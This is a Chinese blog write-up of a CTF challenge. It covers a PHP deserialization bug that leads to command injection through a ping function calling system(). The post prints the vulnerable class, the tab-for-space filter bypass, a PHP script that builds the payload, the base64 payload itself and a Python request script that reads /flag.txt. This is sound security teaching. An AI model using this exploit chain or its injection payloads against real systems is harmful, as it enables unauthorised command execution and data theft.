php 反序列注入,CTF中PHP反序列化和命令注入的一次简单利用

最新推荐文章于 2024-05-13 12:10:19 发布
最新推荐文章于 2024-05-13 12:10:19 发布
阅读量708 收藏
点赞数
文章标签: php 反序列注入

代码来自第六届防灾科技学院网络安全技能大赛,侵删。php

目标

获取Linux服务器根目录下的flagpython

代码

/*home.php*/

class home{

private $method;

private $args;

function __construct($method, $args) {

$this->method = $method;

$this->args = $args;

}

function __destruct(){

if (in_array($this->method, array("ping"))) {

call_user_func_array(array($this, $this->method), $this->args);

}

}

function ping($host){

system("ping -c 2 $host");

}

function waf($str){

$str=str_replace(' ','',$str);

return $str;

}

function __wakeup(){

foreach($this->args as $k => $v) {

$this->args[$k] = $this->waf(trim(mysql_escape_string($v)));

}

}

}

$a=@$_POST['a'];

@unserialize(base64_decode($a));

分析

该PHP文件只接收一个base64编码的POST参数,将其解码后会进行反序列化操做。mysql

在执行__wakeup()方法以后,会触发__construct()方法进行初始化,该方法没有能够利用的地方。sql

当全部的操做执行完毕以后,须要释放序列化的对象,触发__destruct()魔术方法。该方法只容许执行类中的ping方法,并会将args的值做为ping方法host参数。shell

ping中存在可控参数$host,且调用了system函数,这里即可以做为一个利用点。能够构造一个特殊的payload:安全

ping -c 2 127.0.0.1|cat /flag.txt

#不惟一

利用

整理上面的思路可知,若想获得flag最终要构造出以下的args字符串:服务器

127.0.0.1|cat /flag.txt

而waf等方法又过滤掉了空格,这里能够经过将空格换成Tab来绕过该限制。

同时还要注意method必须为ping。网络

这里获得了构造payload的最终PHP脚本:函数

class home{

private $method;

private $args;

}

$a = new home("ping",array('127.0.0.1|cat /flag.txt'));

$b = serialize($a);

echo base64_encode($b);

payloadpost

Tzo0OiJob21lIjoyOntzOjEyOiIAaG9tZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGhvbWUAYXJncyI7YToxOntpOjA7czoyNDoiMTI3LjAuMC4xfGNhdCAJL2ZsYWcudHh0Ijt9fQ==

发送payload获得flag

import requests

data ={"a":"Tzo0OiJob21lIjoyOntzOjEyOiIAaG9tZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGhvbWUAYXJncyI7YToxOntpOjA7czoyNDoiMTI3LjAuMC4xfGNhdCAJL2ZsYWcudHh0Ijt9fQ=="}

url = 'http://localhost/common/home.php'

r = requests.post(url,data=data)

print(r.text)

#result:flag{glzjin_wants_a_girl_friend}

本文分享 CNBlog - kevin_bruce。

若有侵权,请联系 support@oschina.cn 删除。

本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一块儿分享。

树非树
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浅析PHP反序列化过滤函数使用不当导致的对象注入问题
12-20
PHP编程序列化和反序列化是常见的数据处理技术,用于将对象转换为字符串以便存储或传输,然后再恢复为原始对象。然而,如果在反序列化过程处理不当,尤其是使用过滤函数时,可能会引发对象注入漏洞。本文将...
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
5. 观察或利用反序列化过程的副作用,如执行恶意代码或修改内部状态。 在0CTF-2016-piapiapia挑战,由于没有提供完整的源代码,具体的利用方法可能需要依赖于`class.php`定义的类和方法。但这个案例提醒我们...
PHP反序列化
L0g1c的博客
10-22 1174
序列是指把对象转换为字符串的过程,便于在内存、文件、数据库保存、传输,PHP使用serialize函数进行序列化。 运行结果为 各个字符的意义:字母O代表Object,a代表array,s代表string,i 表示数字 O代表Object对象,6代表类名(Person)的长度是6,3代表类的属性有3个。{}内就是类的属性信息,每个属性以分号;结束。 s代表string类型,4代表属性名(name)的长度,name后面是属性值,string类型,数值长度为3,数值为php。若类属性值未初始化,则默认值
【网络安全 CTF】unseping 江苏工匠杯_ctf网络安全大赛 unseping
最新发布
2401_84970331的博客
05-13 420
【代码】【网络安全 CTF】unseping 江苏工匠杯_ctf网络安全大赛 unseping。
php函数重载 和call_user_func和call_user_func_array详解
云烟阁
01-03 2137
php函数call_user_func和call_user_func_array详解 call_user_func函数类似于一种特别的调用函数的方法,使用方法如下:  function a($b,$c) { echo $b; echo $c; } call_user_func('a', "111","222"); call_user_func('a', "333","444");
PHP __Call()和call_user_func_array()方法的使用方法
xiongmao000738
02-22 3036
转自:PHP5与MySQL5web开发技术详解 <?php class MyClass1 { private $obj; function __construct($obj) { $this->obj =$obj; } function __call($Method, $Args) {
php反序列化java_PHP反序列化漏洞简介及相关技巧小结
weixin_36411269的博客
02-25 366
*严正声明:本文仅限于技术讨论与分享,严禁用于非法途径要学习PHP序列漏洞,先了解下PHP序列化和反序列化是什么东西。php程序为了保存和转储对象,提供了序列化的方法,php序列化是为了在程序运行的过程对对象进行转储而产生的。序列化可以将对象转换成字符串,但仅保留对象里的成员变量,不保留函数方法。php序列化的函数为serialize。反序列化的函数为unserialize。序列化举个栗子:...
PHP反序列化漏洞详解.rar
02-07
PHP序列化与反序列化** - **序列化**:PHP序列化是将变量转换为字符串的过程,便于存储或传输。序列化的结果是一个包含了变量类型、值以及任何与之相关的复杂数据结构的信息的特殊格式字符串。 - **反序列化**:...
awd-watchbird:适用于AWD的功能强大PHP WAF
03-19
易于配置(单文件,无需加载外部js / css)可以随时开启/关闭某项防御基本防御:数据库注入(SQL注入)文件上传(上传)文件包含(lfi)标志关键字PHP反序列化反序列化命令执行(rce)分布式拒绝服务攻击(ddos...
CTF Web各种题目的解题姿势
07-27
课时3:PHP序列化特殊点介绍15'28 课时4:魔术方法20'35 课时5:序列化漏洞案例 - 任意命令执行05'53 课时6:Phar反序列化10'38 第7章 第7章 Python基础 课时1:7.1-Requests模块安装与介绍15'28 课时2:7.2-...
实验室:通过扩展黑名单绕过 Web shell 上传
Loser5的博客
03-19 3516
实验室:通过扩展黑名单绕过 Web shell 上传
Web安全攻防世界04 unseping(江苏工匠杯)
weixin_42789937的博客
12-01 1718
Web安全攻防世界04 unseping(江苏工匠杯)参考大佬们的WP有所补充,时隔多月再次整理博文,修复了原来不明白的点,内容小白友好~
攻防世界新手练习区——unseping
weixin_65049289的博客
12-21 3528
攻防世界新手练习区——unseping
PHP反序列化漏洞
weixin_43263451的博客
08-08 479
在进行反序列化时会执行类的魔法函数,如果魔法函数的参数是输入可控的那么就可能造成命令执行漏洞 pikachu界面如下: 查看后端部分源码: class S{ var $test = "pikachu"; function __wakeup(){ echo $this->test; sleep(5); }}//O:1:"S":1:{s:4:"t...
php反序列化漏洞基础
Anton__1的博客
08-31 973
PHP序列化与序列化 作者:H3h3QAQ 一、PHP序列化和反序列化 1.PHP反序列化: serialize() 将变量或者对象转换成字符串的过程,用于存储或传递PHP的值的过程种,同时不丢失其类型和结构 常见的序列化字母表示及其含义: a - array ----->a:<n>:{<key 1><value 1>...<key n><value n>} b - boolean ----->b:<digit> d
反序列化__wakeup
yyj1781572的博客
12-06 300
反序列化__wakeup
攻防世界 WEB刷题
weixin_73055648的博客
07-11 456
攻防世界web刷题
攻防世界Web题 - unseping 总结
weixin_62871152的博客
11-02 2210
攻防世界-WEB
ctf php反序列化
06-07
CTFPHP反序列化攻击主要针对使用PHP的Web应用程序,攻击者可以利用PHP反序列化漏洞来执行恶意代码或者获取敏感信息。攻击者通常会通过构造恶意的序列化数据来触发漏洞,从而实现攻击的目的。 在实际攻击,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值